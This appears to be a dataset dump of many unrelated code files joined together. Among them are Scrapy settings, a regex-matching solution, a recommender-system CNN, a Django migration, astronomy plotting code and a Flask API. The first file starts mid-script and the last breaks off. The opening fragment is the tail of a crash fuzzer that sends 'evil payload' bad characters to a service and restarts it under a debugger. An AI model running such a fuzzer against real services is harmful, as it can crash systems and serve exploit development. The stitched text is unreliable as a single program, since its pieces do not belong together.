print "[1] Crash payload of size: " + str(len(payload)) + " sent!"
except:
print "socket() failed"
sys.exit(1)
start_crash = False
print "[1] Crash Flag set to" + str(start_crash)
counter+= 1
print "[*] Waiting before sending the next evil payload .."
time.sleep(10)
else:
print "[+] Succesfully completed going through all bad characters"
exit(0)
elif not start_crash:
print "[*] Start crash flag not set"
timer =0
time.sleep(1)
continue
elif timer > 10:
print "[-] Anomaly detected!!! - Waiting to restart ..."
time.sleep(1)
return start_service(process_name,start_cmd)
def main():
crasher_thread = threading.Thread(target=crash_me)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] Crash thread started");
while True:
start_service(process_name,start_cmd)
start_debugging(pid)
print "Process has been terminated"
if __name__ == '__main__':
main() |
999,371 | 3b3c8522a013177cbef72515373d2f9b73ec73aa | # -*- coding: utf-8 -*-
import os.path
import pymongo
import platform
from pcnile import sqlitedict as bsddb
BOT_NAME = 'wolf'
SPIDER_MODULES = ['wolf.spiders']
NEWSPIDER_MODULE = 'wolf.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36'
LOG_LEVEL = 'INFO'
CONCURRENT_REQUESTS = 10
COOKIES_ENABLED = True
DOWNLOAD_DELAY = 0
DOWNLOAD_TIMEOUT = 45
REDIRECT_MAX_TIMES = 3
EXTENSIONS = {
'scrapy.webservice.WebService': None,
'scrapy.telnet.TelnetConsole': None,
'scrapy.contrib.memusage.MemoryUsage': None,
'scrapy.contrib.memdebug.MemoryDebugger': None,
'scrapy.contrib.spiderstate.SpiderState': None,
'scrapy.contrib.throttle.AutoThrottle': None,
'scrapy.contrib.feedexport.FeedExporter': None,
'wolf.feedexport.FeedExporter': 500,
}
LOG_FILE = 'log.log'
# set all kinds of filter
if platform.system() == 'Linux':
DBDIR = '/opt/db/wolf'
else:
DBDIR = 'D:\\obtainfo\\Store\\db'
# make sure directory exists
if not os.path.exists(DBDIR):
os.makedirs(DBDIR)
UrlFilter = bsddb.open(os.path.join(DBDIR, 'url.db'), autocommit=True)
BtFilter = bsddb.open(os.path.join(DBDIR, 'bt.db'), autocommit=True)
Ed2kFilter = bsddb.open(os.path.join(DBDIR, 'ed2k.db'), autocommit=True)
NetdiskFilter = bsddb.open(os.path.join(DBDIR, 'netdisk.db'), autocommit=True)
OnlineFilter = bsddb.open(os.path.join(DBDIR, 'online.db'), autocommit=True)
if platform.system() == 'Linux':
TORRENT_DIR = '/opt/db/torrent'
else:
TORRENT_DIR = 'D:\\obtainfo\\Store\\torrent'
# make sure directory exists
if not os.path.exists(TORRENT_DIR):
os.makedirs(TORRENT_DIR)
# mongodb store
Collection = pymongo.Connection().scrapy.wolf
|
999,372 | fa932327238c16f83e1b29bf0e0698d09a21c73b | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
RESIZED_NEGATIVE_PATH = 'resized_negative_images'
RESIZED_POSITIVE_PATH = 'resized_positive_images'
def create_output_directory_for_resized_images():
"""
General method to create directories for negative images.
"""
try:
if not os.path.isdir(RESIZED_NEGATIVE_PATH):
return os.makedirs(RESIZED_NEGATIVE_PATH)
elif not os.path.isdir(RESIZED_POSITIVE_PATH):
return os.makedirs(RESIZED_POSITIVE_PATH)
except OSError as e:
print('Error --> {}'.format(e))
def get_data_images(path):
"""
General method to prepare images.
"""
return sorted(
[os.path.join(root, filename) for root, dirnames, filenames in os.walk(path) for filename in
filenames if
filename.endswith('.jpg') and os.path.getsize(os.path.join(root, filename)) > 0]
)
|
999,373 | 36b4a0240018e93135358622c32cd7ce01a3f989 | class Solution:
def isMatch(self, s, p):
"""
:type s: str
:type p: str
:rtype: bool
"""
table=[[False]*(len(s)+1) for _ in range(len(p)+1)]
table[0][0]=True
for i in range(1,len(p)+1):
if p[i-1]=='*':
table[i][0]=table[i-2][0]
for i in range(1,len(p)+1):
for j in range(1,len(s)+1):
if p[i-1]!='*':
table[i][j]=table[i-1][j-1] and (p[i-1]==s[j-1] or p[i-1]=='.')
else:
table[i][j]=table[i-2][j] or (table[i][j-1] and (s[j-1]==p[i-2] or p[i-2]=='.'))
return table[-1][-1]
a=Solution()
print(a.isMatch("aa",'a'))
print(a.isMatch("aa",'a*'))
print(a.isMatch("ab",'.*'))
print(a.isMatch("aab","c*a*b"))
print(a.isMatch("mississippi","mis*is*p*."))
|
999,374 | 04a832f70cb08c9584e7487b3aa572fc4b700f23 | from typing import Any, Dict
from ....models.models import ProjectorCountdown
from ....permissions.permissions import Permissions
from ....shared.exceptions import ActionException
from ....shared.filters import And, FilterOperator
from ....shared.patterns import fqid_from_collection_and_id
from ...generics.create import CreateAction
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
@register_action("projector_countdown.create")
class ProjectorCountdownCreate(CreateAction):
"""
Action to create a projector countdown.
"""
model = ProjectorCountdown()
schema = DefaultSchema(ProjectorCountdown()).get_create_schema(
required_properties=["meeting_id", "title"],
optional_properties=[
"description",
"default_time",
],
)
permission = Permissions.Projector.CAN_MANAGE
def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:
self.check_title_unique(instance)
# set default_time if needed and countdown_time
if not instance.get("default_time"):
meeting = self.datastore.get(
fqid_from_collection_and_id("meeting", instance["meeting_id"]),
["projector_countdown_default_time"],
lock_result=False,
)
instance["default_time"] = meeting.get("projector_countdown_default_time")
instance["countdown_time"] = instance["default_time"]
return instance
def check_title_unique(self, instance: Dict[str, Any]) -> None:
title_filter = And(
FilterOperator("meeting_id", "=", instance["meeting_id"]),
FilterOperator("title", "=", instance["title"]),
)
if self.datastore.exists(self.model.collection, title_filter):
raise ActionException("Title already exists in this meeting.")
|
999,375 | dbae9e1ed105de239d2290afcc87abcff5a2201f | import os
import random
import itertools
import time
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from model import *
#from recommendation_worker_nn import *
from parser_file import *
from utils import *
#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
tf.logging.set_verbosity(tf.logging.ERROR)
os.environ["GLOG_minloglevel"] ="3"
print (" --- Recsys Challenge 2017 --- ")
USERS_FILE = "../users.csv"
ITEMS_FILE = "../items.csv"
INTERACTIONS_FILE = "../interactions.csv"
TARGET_USERS = "../targetUsers.csv"
TARGET_ITEMS = "../targetItems.csv"
OUT_FILE = "out_cnn.csv"
FEATURE_DIM = 6
TH = -10
N_CLASS = 5
### set all variables
seed = 128
rng = np.random.RandomState(seed)
input_num_units = 60
output_num_units = 5
dropout = 1 # Dropout, probability to keep units
epochs = 50
batch_size = 128
learning_rate = 0.01
'''
1) Parse the challenge data, exclude all impressions
Exclude all impressions
'''
with tf.device('/gpu:0'):
(header_users, users) = select(USERS_FILE, lambda x: True, build_user, lambda x: int(x[0]))
(header_items, items) = select(ITEMS_FILE, lambda x: True, build_item, lambda x: int(x[0]))
#transfer data into ndarray
X_val = []
#Y_prob_val = np.zeros([1, 5])
Y_val = np.zeros(N_CLASS)
ui_score = dict()
cnt = 0
for line in itertools.islice(open(INTERACTIONS_FILE), 100000):
cnt += 1
if is_header(line):
header = process_header(line.strip().split('\t'))
else:
cmp = line.strip().split('\t')
inter_type = int(cmp[header['interaction_type']])
user_id = int(cmp[header['user_id']])
item_id = int(cmp[header['item_id']])
if inter_type != 0:
ui_score[user_id] = ui_score.get(user_id, dict())
ui_score[user_id][item_id] = ui_score[user_id].get(item_id, set())
ui_score[user_id][item_id].add(inter_type)
if cnt % 1000000 == 0:
print("... reading line %d from file %s" % (cnt, INTERACTIONS_FILE))
for u_id, jobs in ui_score.items():
for j_id, inter_types in jobs.items():
x = getFeat(users[u_id], items[j_id])
X_val.append(x)
y = getMultiIntScore(inter_types)
Y_val = np.concatenate((Y_val, y))
train_x = np.stack(X_val).reshape(-1, input_num_units)
train_x = preproc(train_x)
print(train_x.shape)
Y_val = Y_val.reshape(-1, N_CLASS)
#print(Y_val[1:10,:])
train_y = Y_val[1:]
print(train_y.shape)
#train_y = Y_val[1:]
split_size = int(train_x.shape[0] * 0.7)
train_x, val_x = train_x[:split_size], train_x[split_size:]
train_y, val_y = train_y[:split_size], train_y[split_size:]
# define placeholders
x = tf.placeholder(tf.float32, [None, input_num_units])
y = tf.placeholder(tf.float32, [None, output_num_units])
keep_prob = tf.placeholder(tf.float32) # dropout (keep probability)
# Create some wrappers for simplicity
def conv2d(x, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def maxpool2d(x, k=2):
# MaxPool2D wrapper
return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],
padding='SAME')
# Create model
def conv_net(x, weights, biases, dropout):
# Reshape input picture
x = tf.reshape(x, shape=[-1, 10, 6, 1])
# Convolution Layer
conv1 = conv2d(x, weights['wc1'], biases['bc1'])
# Max Pooling (down-sampling)
conv1 = maxpool2d(conv1, k=2)
# Convolution Layer
conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])
# Max Pooling (down-sampling)
conv2 = maxpool2d(conv2, k=2)
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
print(weights['wd1'].get_shape().as_list()[0])
fc1 = tf.reshape(conv2, [-1, weights['wd1'].get_shape().as_list()[0]])
fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])
fc1 = tf.nn.relu(fc1)
# Apply Dropout
fc1 = tf.nn.dropout(fc1, dropout)
# Output, class prediction
out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])
return out
# Store layers weight & bias
weights = {
# 5x5 conv, 1 input, 32 outputs
'wc1': tf.Variable(tf.random_normal([3, 3, 1, 32])),#4*3*32
# 5x5 conv, 32 inputs, 64 outputs
'wc2': tf.Variable(tf.random_normal([3, 3, 32, 64])),
# fully connected, 7*7*64 inputs, 1024 outputs
'wd1': tf.Variable(tf.random_normal([3*2*64, 84])),
# 1024 inputs, 10 outputs (class prediction)
'out': tf.Variable(tf.random_normal([84, output_num_units]))
}
biases = {
'bc1': tf.Variable(tf.random_normal([32])),
'bc2': tf.Variable(tf.random_normal([64])),
'bd1': tf.Variable(tf.random_normal([84])),
'out': tf.Variable(tf.random_normal([output_num_units]))
}
# Construct model
pred = conv_net(x, weights, biases, keep_prob)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=pred, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# Initializing the variables
init = tf.global_variables_initializer()
print('mark-1')
with tf.Session() as sess:
print('mark0')
# create initialized variables
sess.run(init)
### for each epoch, do:
### for each batch, do:
### create pre-processed batch
### run optimizer by feeding batch
### find cost and reiterate to minimize
for epoch in range(epochs):
avg_cost = 0
total_batch = int(train_x.shape[0] / batch_size)
for i in range(total_batch):
batch_x, batch_y = batch_creator(batch_size, train_x.shape[0], train_x, train_y, input_num_units, rng)
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y: batch_y, keep_prob: dropout})
avg_cost += c / total_batch
print("Epoch:", (epoch + 1), "loss =", "{0:.5f}".format(float(avg_cost)))
print("\nTraining complete!")
# find predictions on val set
# one correct
# pred_temp = tf.losses.mean_squared_error(pred, y)
#val_loss = tf.reduce_mean(tf.cast(pred_temp, "float"))
#v=val_loss.eval({x: val_x.reshape(-1, input_num_units), y: val_y, keep_prob: dropout})
#print("Validation Loss:", float(v/1e10))
print('mark2')
'''
4) Create target sets for items and users
'''
target_users = []
for line in open(TARGET_USERS):
target_users += [int(line.strip())]
target_users = set(target_users)
target_items = []
for line in open(TARGET_ITEMS):
target_items += [int(line.strip())]
with open(OUT_FILE, 'w') as fp:
pos = 0
average_score = 0.0
num_evaluated = 0.0
for i in target_items:
data = []
ids = []
# build all (user, item) pair features based for this item
for u in target_users:
xx = getFeat(users[u], items[i])
#f = x.features()
#data += [f]
#ids += [u]
if float(len(set(users[u].title).intersection(set(items[i].title)))) > 0:
f = preproc(xx)
data += [f]
ids += [u]
if len(data) > 0:
data = np.array(data).reshape(-1, input_num_units)
test_x = data.astype('float')
test_y = np.zeros((data.shape[0], output_num_units))
'''
test_prediction = tf.nn.softmax(tf.nn.relu(tf.matmul(
tf.nn.relu(tf.add(tf.matmul(data, weights['hidden']), biases['hidden']))) + bout)))
'''
#print(type(data))
#print(type(test_y))
#print(type(output_layer))
prediction = tf.sigmoid(pred)
#prediction = tf.cast(pred, "float")
#ypred = prediction.eval({x: data})
classification = sess.run(prediction, feed_dict={x: test_x, keep_prob: dropout})
ypred = classification[:,0] + 5*classification[:, 1] + 5*classification[:, 2] - 10*classification[:, 3] +20*classification[:, 4]
#print(classification.shape)
#print(ypred)
#ypred = classification[0]
#score need updated
user_ids = sorted(
[
(ids_j, ypred_j) for ypred_j, ids_j in zip(ypred, ids) if ypred_j > TH
],
key=lambda x: -x[1]
)[0:99]
# write the results to file
if len(user_ids) > 0:
item_id = str(i) + "\t"
fp.write(item_id)
for j in range(0, len(user_ids)):
user_id = str(user_ids[j][0]) + ","
fp.write(user_id)
user_id = str(user_ids[-1][0]) + "\n"
fp.write(user_id)
fp.flush()
# Every 100 iterations print some stats
if pos % 100 == 0:
percentageDown = str(pos / float(len(target_items)))
print(OUT_FILE + " " + percentageDown)
pos += 1
|
999,376 | 75f02364e15680b822ddcc601c42064956edcf96 | print "Age:",
age = raw_input()
print "Height (inches)",
height = raw_input()
print "Weigha (lbs):",
weight = raw_input()
print "So, you're %r years old, %r inches tall, and weigh %r pounds." % (age, height, weight)
|
999,377 | 303aed6d45370599c7af5924a982a4747cc9e949 | # Generated by Django 3.1.7 on 2021-02-27 06:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('website', '0017_auto_20210227_1056'),
]
operations = [
migrations.RenameField(
model_name='softwares',
old_name='features',
new_name='features_content',
),
migrations.RenameField(
model_name='softwares',
old_name='sub_features_head',
new_name='features_head',
),
migrations.RemoveField(
model_name='softwares',
name='sub_features_content',
),
migrations.AlterField(
model_name='about',
name='position',
field=models.CharField(max_length=50, null=True),
),
migrations.AlterField(
model_name='about',
name='profile',
field=models.CharField(max_length=50, null=True),
),
]
|
999,378 | 96dfd8f1a972e7801b288a0a0656a2ab42d7c099 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Lacerda@Granada - 26/Nov/2014
#
import numpy as np
import h5py
import matplotlib as mpl
from matplotlib import pyplot as plt
import sys
from plot_aux import get_attrib_h5, density_contour, \
list_gal_sorted_by_data, calcRunningStats, \
data_uniq, plot_text_ax, plot_linreg_params
from matplotlib.ticker import MultipleLocator
from scipy import stats as st
def plot_gal_img_ax(ax, imgfile, gal):
galimg = plt.imread(imgfile)
ax.imshow(galimg)
txt = '%s' % gal
plot_text_ax(ax, txt, 0.05, 0.92, 8, 'top', 'left')
def plot_reglin_ax(ax, x, y, txt_x_pos, txt_y_pos, color):
y_slope, y_intercept, y_r_value, y_p_value, y_std_err = st.linregress(x, y)
step = (x.max() - x.min()) / len(x)
X = np.linspace(x.min(), x.max() + step, len(x))
Y = y_slope * X + y_intercept
ax.plot(X, Y, c = color, ls = '-', lw = 2)
txt = 'y = %.2fx+%.2f' % (y_slope, y_intercept)
plot_text_ax(ax, txt, txt_x_pos, txt_y_pos, 8, 'top', 'left', color)
return y_slope, y_intercept, y_r_value, y_p_value, y_std_err
def new_img_mosaic(NRows, NCols, age, ticks, sorted_by):
f, axArr = plt.subplots(NRows, NCols)
f.set_dpi(300)
f.set_size_inches(11.69,8.27)
plt.setp([a.get_xticklabels() for a in f.axes], visible = False)
plt.setp([a.get_yticklabels() for a in f.axes], visible = False)
plot_suptitle = '%.2f Myr' % (age/1e6)
if ticks:
plot_suptitle = '%s xlim fixed' % plot_suptitle
plot_suptitle = '%s - sort_param: %s' % (plot_suptitle, sorted_by)
f.suptitle(plot_suptitle)
for ax in f.axes:
ax.set_axis_off()
return f, axArr
def save_img_mosaic(f, fname, ticks):
plt.subplots_adjust(wspace=0, hspace=0, left=0.1, bottom=0.1, right=0.9, top=0.95)
if ticks:
fname = '%s_xfix' % (fname)
f.savefig('%s.png' % fname)
sort_param = {
'Mcor' : False,
'McorSD' : False,
'MorphType' : False,
'Mr' : False,
'u-r' : False,
}
try:
h5file = sys.argv[1]
iT = np.int(sys.argv[2])
sorted_by = sys.argv[3]
except IndexError:
print 'usage: %s HDF5FILE [0-39] %s' % (sys.argv[0], sort_param.keys())
exit(1)
mpl.rcParams['font.size'] = 16
mpl.rcParams['axes.labelsize'] = 16
mpl.rcParams['axes.titlesize'] = 18
mpl.rcParams['xtick.labelsize'] = 12
mpl.rcParams['ytick.labelsize'] = 12
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['font.serif'] = 'Times New Roman'
h5 = h5py.File(h5file, 'r')
tSF__T = get_attrib_h5(h5, 'tSF__T')
# zones
SFR__Tg = get_attrib_h5(h5, 'SFR__Tg')
SFR_Ha__g = get_attrib_h5(h5, 'SFR_Ha__g')
SFRSD__Tg = get_attrib_h5(h5, 'SFRSD__Tg')
SFRSD_Ha__g = get_attrib_h5(h5, 'SFRSD_Ha__g')
SFRSD_Ha_kpc__g = get_attrib_h5(h5, 'SFRSD_Ha_kpc__g')
dist_zone__g = get_attrib_h5(h5, 'dist_zone__g')
tau_V__Tg = get_attrib_h5(h5, 'tau_V__Tg')
tau_V_neb__g = get_attrib_h5(h5, 'tau_V_neb__g')
L_int_Ha__g = get_attrib_h5(h5, 'L_int_Ha__g')
F_obs_Ha__g = get_attrib_h5(h5, 'F_obs_Ha__g')
Mcor__g = get_attrib_h5(h5, 'Mcor__g')
McorSD__g = get_attrib_h5(h5, 'McorSD__g')
# galaxy wide quantities replicated by zones
Mcor_GAL_zones__g = get_attrib_h5(h5, 'Mcor_GAL_zones__g')
McorSD_GAL_zones__g = get_attrib_h5(h5, 'McorSD_GAL_zones__g')
morfType_GAL_zones__g = get_attrib_h5(h5, 'morfType_GAL_zones__g')
at_flux_GAL_zones__g = get_attrib_h5(h5, 'at_flux_GAL_zones__g')
califaID_GAL_zones__g = get_attrib_h5(h5, 'califaID_GAL_zones__g')
Mr_GAL_zones__g = get_attrib_h5(h5, 'Mr_GAL_zones__g')
ur_GAL_zones__g = get_attrib_h5(h5, 'ur_GAL_zones__g')
sort_param['Mcor'] = np.log10(Mcor_GAL_zones__g)
sort_param['McorSD'] = np.log10(McorSD_GAL_zones__g)
sort_param['MorphType'] = morfType_GAL_zones__g
sort_param['Mr'] = Mr_GAL_zones__g
sort_param['u-r'] = ur_GAL_zones__g
label = { '%s' % k : False for k in sort_param.keys()}
label['Mcor'] = r'$\log\ M_\star^{gal}\ [M_\odot]$'
label['McorSD'] = r'$\log\ \mu_\star^{gal}\ [M_\odot\ pc^{-2}]$'
label['MorphType'] = r'Morphological type'
label['Mr'] = r'$M_r$'
label['u-r'] = r'u - r'
NGal, listGal_ns, sorted_data__g = data_uniq(califaID_GAL_zones__g, sort_param[sorted_by])
listGal = list_gal_sorted_by_data(listGal_ns, sorted_data__g, -1)
#ticks = True
ticks = False
min_pixel_to_plot = 5
fname_suffix = 'sor%s_%.2fMyr' % (sorted_by, tSF__T[iT]/1e6)
###################################################################################
xname = 'dtau'
yname = 'SFR_Ha'
newImage = True
NRows = 7
NCols = 10
iGal = 0
i = 0
j = 0
k = 0
last_row = 0
dtau_slope = np.ma.masked_all((NGal))
dtau_x0 = np.ma.masked_all((NGal))
dtau_stderr = np.ma.masked_all((NGal))
dtau_r = np.ma.masked_all((NGal))
while iGal < NGal:
if newImage:
f, axArr = new_img_mosaic(NRows, NCols, tSF__T[iT], ticks, sorted_by)
newImage = False
gal = listGal[iGal]
where_slice = np.where(califaID_GAL_zones__g == gal)[0]
N_zone = len(where_slice)
x1 = tau_V__Tg[iT][where_slice]
x2 = tau_V_neb__g[where_slice]
y = np.ma.log10(SFR_Ha__g[where_slice])
mask = ~(x1.mask | x2.mask | y.mask)
x1m = x1[mask]
x2m = x2[mask]
ym = y[mask]
xm = x2m - x1m
N_not_masked = mask.sum()
if N_not_masked >= min_pixel_to_plot:
last_row = i
ax1 = axArr[i, j]
j += 1
ax2 = axArr[i, j]
ax1.set_axis_on()
ax2.set_axis_on()
#print '%s %d %d' % (gal, N_zone, N_not_masked)
xlabel = r'$\delta\tau\ [\tau_V^{neb}\ -\ \tau_V^\star]$'
ylabel = r'$\log\ SFR_{neb}\ $[M${}_\odot$ yr${}^{-1}]$'
ax1.scatter(xm, ym, c = 'k', marker = 'o', s = 10., edgecolor = 'none', alpha = 0.6)
xlim = [ -1, 2. ]
ylim = [-4., -0.5]
ax1.set_xlim(xlim)
if ticks:
ax1.set_ylim(ylim)
#ax.set_title(r'%.2f Myr' % (tSF__T[iT] / 1.e6))
#ax.legend(fontsize = 14, frameon = False, loc = 'upper right')
# notice the change in y and x axis so:
# log SFR = A log_dtau + B
aux = plot_reglin_ax(ax1, xm, ym, 0.05, 0.92, 'k')
dtau_slope[iGal] = aux[0]
dtau_x0[iGal] = aux[1]
dtau_r[iGal] = aux[2]
dtau_stderr[iGal] = aux[4]
plot_gal_img_ax(ax2, '/Users/lacerda/CALIFA/images/%s.jpg' % gal, gal)
if ticks and i == NRows - 1 and j == 1:
plt.setp(ax1.get_xticklabels(), visible = True, rotation = 90)
plt.setp(ax1.get_yticklabels(), visible = True)
if i == NRows - 1 and j == 5:
ax2.set_xlabel(xlabel)
if i == 3 and j == 1:
ax1.set_ylabel(ylabel)
if j == NCols - 1:
if i == NRows -1:
i = 0
newImage = True
save_img_mosaic(f, '%s_%s_%s_%d' % (xname, yname, fname_suffix, k), ticks)
plt.close(f)
k += 1
else:
i += 1
j = 0
else:
j += 1
if newImage == False and iGal == NGal - 1:
ax1 = axArr[last_row, 0]
if ticks:
plt.setp(ax1.get_xticklabels(), visible = True, rotation = 90)
plt.setp(ax1.get_yticklabels(), visible = True)
if last_row < NRows - 1:
ax = axArr[last_row, 5]
ax.set_xlabel(xlabel)
if last_row < 3:
ax1.set_ylabel(ylabel)
save_img_mosaic(f, '%s_%s_%s_%d' % (xname, yname, fname_suffix, k), ticks)
plt.close(f)
iGal += 1
ylab = r'$\delta\tau$'
plot_linreg_params(dtau_slope, sorted_data__g, label[sorted_by],
r'%s slope' % ylab, '%s_slope_%s.png' % (xname, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(dtau_x0, sorted_data__g, label[sorted_by],
r'%s x0' % ylab, '%s_x0_%s.png' % (xname, fname_suffix),
best_param = 0., fontsize = 8)
plot_linreg_params(dtau_stderr, sorted_data__g, label[sorted_by],
r'%s stderr' % ylab, '%s_stderr_%s.png' % (xname, fname_suffix))
plot_linreg_params(dtau_r**2., sorted_data__g, label[sorted_by],
r'%s $r^2$' % ylab, '%s_sqrcor_%s.png' % (xname, fname_suffix),
best_param = 1., fontsize = 8)
##########################################################################################
x1name = 'tau_V'
x2name = 'tau_V_neb'
yname = 'SFR_Ha'
newImage = True
NRows = 7
NCols = 10
iGal = 0
i = 0
j = 0
k = 0
min_pixel_to_plot = 5
last_row = 0
tau_V_slope = np.ma.masked_all((NGal))
tau_V_x0 = np.ma.masked_all((NGal))
tau_V_stderr = np.ma.masked_all((NGal))
tau_V_r = np.ma.masked_all((NGal))
tau_V_neb_slope = np.ma.masked_all((NGal))
tau_V_neb_x0 = np.ma.masked_all((NGal))
tau_V_neb_stderr = np.ma.masked_all((NGal))
tau_V_neb_r = np.ma.masked_all((NGal))
while iGal < NGal:
if newImage:
f, axArr = new_img_mosaic(NRows, NCols, tSF__T[iT], ticks, sorted_by)
newImage = False
gal = listGal[iGal]
where_slice = np.where(califaID_GAL_zones__g == gal)[0]
N_zone = len(where_slice)
x1 = tau_V__Tg[iT][where_slice]
x2 = tau_V_neb__g[where_slice]
y = np.ma.log10(SFR_Ha__g[where_slice])
mask = ~(y.mask | x1.mask | x2.mask)
x1m = x1[mask]
x2m = x2[mask]
ym = y[mask]
N_not_masked = mask.sum()
if N_not_masked >= min_pixel_to_plot:
last_row = i
ax1 = axArr[i, j]
j += 1
ax2 = axArr[i, j]
ax1.set_axis_on()
ax2.set_axis_on()
#print '%s %d %d' % (gal, N_zone, N_not_masked)
xlabel = r'$\tau_V$'
ylabel = r'$\log\ SFR_{neb}\ $[M${}_\odot$ yr${}^{-1}]$'
ax1.scatter(x1m, ym, c = 'r', marker = 'o', s = 10., edgecolor = 'none', alpha = 0.6, label = r'$\tau_V^\star$')
ax1.scatter(x2m, ym, c = 'b', marker = 'o', s = 10., edgecolor = 'none', alpha = 0.6, label = r'$\tau_V^{neb}$')
xlim = [ 0., 2. ]
ylim = [-4., -0.5]
ax1.set_xlim(xlim)
if ticks:
ax1.set_ylim(ylim)
#ax.set_title(r'%.2f Myr' % (tSF__T[iT] / 1.e6))
#ax.legend(fontsize = 14, frameon = False, loc = 'upper right')
aux = plot_reglin_ax(ax1, x1m, ym, 0.05, 0.82, 'r')
tau_V_slope[iGal] = aux[0]
tau_V_x0[iGal] = aux[1]
tau_V_r[iGal] = aux[2]
tau_V_stderr[iGal] = aux[4]
aux = plot_reglin_ax(ax1, x2m, ym, 0.05, 0.92, 'b')
tau_V_neb_slope[iGal] = aux[0]
tau_V_neb_x0[iGal] = aux[1]
tau_V_neb_r[iGal] = aux[2]
tau_V_neb_stderr[iGal] = aux[4]
plot_gal_img_ax(ax2, '/Users/lacerda/CALIFA/images/%s.jpg' % gal, gal)
if ticks and i == NRows - 1 and j == 1:
plt.setp(ax1.get_xticklabels(), visible = True, rotation = 90)
plt.setp(ax1.get_yticklabels(), visible = True)
if i == NRows - 1 and j == 5:
ax2.set_xlabel(xlabel)
if i == 3 and j == 1:
ax1.set_ylabel(ylabel)
if j == NCols - 1:
if i == NRows -1:
i = 0
newImage = True
save_img_mosaic(f, '%s_%s_%s_%s_%d' % (x1name, x2name, yname, fname_suffix, k), ticks)
plt.close(f)
k += 1
else:
i += 1
j = 0
else:
j += 1
if newImage == False and iGal == NGal - 1:
ax1 = axArr[last_row, 0]
if ticks:
plt.setp(ax1.get_xticklabels(), visible = True, rotation = 90)
plt.setp(ax1.get_yticklabels(), visible = True)
if last_row < NRows - 1:
ax = axArr[last_row, 5]
ax.set_xlabel(xlabel)
if last_row < 3:
ax1.set_ylabel(ylabel)
save_img_mosaic(f, '%s_%s_%s_%s_%d' % (x1name, x2name, yname, fname_suffix, k), ticks)
plt.close(f)
iGal += 1
y1lab = r'$\tau_V^\star$'
plot_linreg_params(tau_V_slope, sorted_data__g, label[sorted_by],
r'%s slope' % y1lab, '%s_slope_%s.png' % (x1name, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(tau_V_x0, sorted_data__g, label[sorted_by],
r'%s x0' % y1lab, '%s_x0_%s.png' % (x1name, fname_suffix),
best_param = 0., fontsize = 8)
plot_linreg_params(tau_V_r**2., sorted_data__g, label[sorted_by],
r'%s $r^2$' % y1lab, '%s_sqrcor_%s.png' % (x1name, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(tau_V_stderr, sorted_data__g, label[sorted_by],
r'%s stderr' % y1lab, '%s_stderr_%s.png' % (x1name, fname_suffix))
y2lab = r'$\tau_V^{neb}$'
plot_linreg_params(tau_V_neb_slope, sorted_data__g, label[sorted_by],
r'%s slope' % y2lab, '%s_slope_%s.png' % (x2name, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(tau_V_neb_x0, sorted_data__g, label[sorted_by],
r'%s x0' % y2lab, '%s_x0_%s.png' % (x2name, fname_suffix),
best_param = 0., fontsize = 8)
plot_linreg_params(tau_V_neb_r**2., sorted_data__g, label[sorted_by],
r'%s $r^2$' % y2lab, '%s_sqrcor_%s.png' % (x2name, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(tau_V_neb_stderr, sorted_data__g, label[sorted_by],
r'%s stderr' % y2lab, '%s_stderr_%s.png' % (x2name, fname_suffix))
|
999,379 | 0fccf66cc28c2e85cf9ee8826eb383dd94d4d5e6 | /home/student/rosws/devel/.private/roslz4/lib/python2.7/dist-packages/roslz4/__init__.py |
999,380 | 997bfa8df1449669471173af906fbb1d4f8e6e02 | from flask import Flask
from flask_migrate import Migrate
from flask_restful import Api
from config import Config
from extensions import db, jwt
from resources.user import UserListResource, UserResource, MeResource, UserSheetListResource
from resources.token import TokenResource, RefreshResource, RevokeResource, black_list
from resources.sheet import SheetListResource, SheetResource, SheetPublishResource
def create_app():
app = Flask(__name__)
app.config.from_object(Config)
app.app_context().push()
register_extensions(app)
register_resources(app)
return app
def register_extensions(app):
db.init_app(app)
migrate = Migrate(app, db)
jwt.init_app(app)
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
jti = decrypted_token['jti']
return jti in black_list
def register_resources(app):
api = Api(app)
api.add_resource(UserListResource, '/users')
api.add_resource(UserResource, '/users/<string:username>')
api.add_resource(UserSheetListResource, '/users/<string:username>/sheets')
api.add_resource(MeResource, '/me')
api.add_resource(TokenResource, '/token')
api.add_resource(RefreshResource, '/refresh')
api.add_resource(RevokeResource, '/revoke')
api.add_resource(SheetListResource, '/sheets')
api.add_resource(SheetResource, '/sheets/<int:sheet_id>')
api.add_resource(SheetPublishResource, '/sheets/<int:sheet_id>/publish')
if __name__ == '__main__':
app = create_app()
app.run()
|
999,381 | 877f605e951145fc5e2c36ceda53f3305f760420 | import pickle # 用于读取pkl文件
import numpy as np
import scipy.sparse.csr
import random
def ReadPkl(filename: str):
file = open(filename, "rb")
data = pickle.load(file)
# 对于邻接矩阵文件,这里可以读取到邻接矩阵形式,例如:(4, 192082) 1
